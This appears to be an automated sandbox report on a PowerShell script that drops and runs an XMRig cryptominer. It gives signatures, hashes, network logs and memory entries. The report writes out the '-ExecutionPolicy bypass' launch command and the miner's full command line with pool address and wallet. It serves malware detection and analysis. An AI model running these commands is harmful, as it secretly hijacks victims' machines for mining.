Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 21.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/2752-0-0x00007FFE5BD23000-0x00007FFE5BD25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulpl3bhd.q0v.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2752-10-0x00007FFE5BD20000-0x00007FFE5C7E1000-memory.dmp

memory/2752-11-0x000002BBA5C20000-0x000002BBA5C42000-memory.dmp

memory/2752-12-0x00007FFE5BD20000-0x00007FFE5C7E1000-memory.dmp

memory/2752-14-0x00007FFE5BD20000-0x00007FFE5C7E1000-memory.dmp

memory/2752-15-0x000002BBA5C90000-0x000002BBA5CA2000-memory.dmp

memory/2752-16-0x000002BBA5C00000-0x000002BBA5C0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4904-47-0x000001F9A56E0000-0x000001F9A5700000-memory.dmp

memory/4904-48-0x000001F9A6E50000-0x000001F9A6E70000-memory.dmp

memory/4904-49-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/2752-51-0x00007FFE5BD20000-0x00007FFE5C7E1000-memory.dmp

memory/4904-53-0x000001F9A6E90000-0x000001F9A6EB0000-memory.dmp

memory/4904-52-0x000001F9A6E70000-0x000001F9A6E90000-memory.dmp

memory/4904-50-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/2752-54-0x00007FFE5BD23000-0x00007FFE5BD25000-memory.dmp

memory/2752-55-0x00007FFE5BD20000-0x00007FFE5C7E1000-memory.dmp

memory/4904-56-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-57-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-58-0x000001F9A6E70000-0x000001F9A6E90000-memory.dmp

memory/4904-59-0x000001F9A6E90000-0x000001F9A6EB0000-memory.dmp

memory/4904-60-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-61-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-62-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-63-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-64-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-65-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-66-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-67-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-68-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-69-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-70-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-71-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-72-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-73-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-74-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-75-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-76-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-77-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-78-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-79-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-80-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-81-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-82-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-83-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-84-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-85-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-86-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-87-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-88-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-89-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-90-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-91-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-92-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-93-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-94-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-95-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-96-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-97-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-98-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-99-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-100-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-101-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-102-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-103-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-104-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-105-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-106-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-107-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-108-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-109-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-110-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-111-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-112-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-113-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-114-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-115-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-116-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-117-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

memory/4904-118-0x00007FF77E1A0000-0x00007FF77EDD3000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:53

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 77.239.69.13.in-addr.arpa udp

Files

memory/2980-0-0x00007FFE30513000-0x00007FFE30515000-memory.dmp

memory/2980-1-0x000001E772E90000-0x000001E772EB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u3qn0zi5.j0t.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2980-11-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/2980-12-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/2980-14-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/2980-15-0x000001E774070000-0x000001E774082000-memory.dmp

memory/2980-16-0x000001E773D10000-0x000001E773D1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4396-47-0x000001A8390E0000-0x000001A839100000-memory.dmp

memory/4396-48-0x000001A839120000-0x000001A839140000-memory.dmp

memory/4396-49-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-53-0x000001A839160000-0x000001A839180000-memory.dmp

memory/4396-50-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-52-0x000001A839140000-0x000001A839160000-memory.dmp

memory/2980-51-0x00007FFE30513000-0x00007FFE30515000-memory.dmp

memory/2980-54-0x00007FFE30510000-0x00007FFE30FD1000-memory.dmp

memory/4396-55-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-56-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-57-0x000001A839140000-0x000001A839160000-memory.dmp

memory/4396-58-0x000001A839160000-0x000001A839180000-memory.dmp

memory/4396-59-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-60-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-61-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-62-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-63-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-64-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-65-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-66-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-67-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-68-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-69-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-70-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-71-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-72-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-73-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-74-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-75-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-76-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-77-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-78-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-79-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-80-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-81-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-82-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-83-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-84-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-85-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-86-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-87-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-88-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-89-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-90-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-91-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-92-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-93-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-94-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-95-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-96-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-97-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-98-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-99-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-100-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-101-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-102-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-103-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-104-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-105-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-106-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-107-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-108-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-109-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-110-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-111-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-112-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-113-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-114-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-115-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-116-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

memory/4396-117-0x00007FF7779C0000-0x00007FF7785F3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:58

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1763s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

memory/3560-4-0x00007FF969A53000-0x00007FF969A54000-memory.dmp

memory/3560-5-0x00000171B1080000-0x00000171B10A2000-memory.dmp

memory/3560-8-0x00007FF969A50000-0x00007FF96A43C000-memory.dmp

memory/3560-9-0x00000171B1260000-0x00000171B12D6000-memory.dmp

memory/3560-10-0x00007FF969A50000-0x00007FF96A43C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3ewtbgn.qqn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3560-25-0x00007FF969A50000-0x00007FF96A43C000-memory.dmp

memory/3560-48-0x00000171B1220000-0x00000171B1232000-memory.dmp

memory/3560-61-0x00000171B10C0000-0x00000171B10CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3844-90-0x00000156B1DA0000-0x00000156B1DC0000-memory.dmp

memory/3844-91-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3560-92-0x00007FF969A53000-0x00007FF969A54000-memory.dmp

memory/3560-93-0x00007FF969A50000-0x00007FF96A43C000-memory.dmp

memory/3844-94-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3560-95-0x00007FF969A50000-0x00007FF96A43C000-memory.dmp

memory/3844-96-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-97-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-98-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-99-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-100-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-101-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-102-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-103-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-104-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-105-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-106-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-107-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-108-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-109-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-110-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-111-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

memory/3844-112-0x00007FF64DF40000-0x00007FF64EB73000-memory.dmp

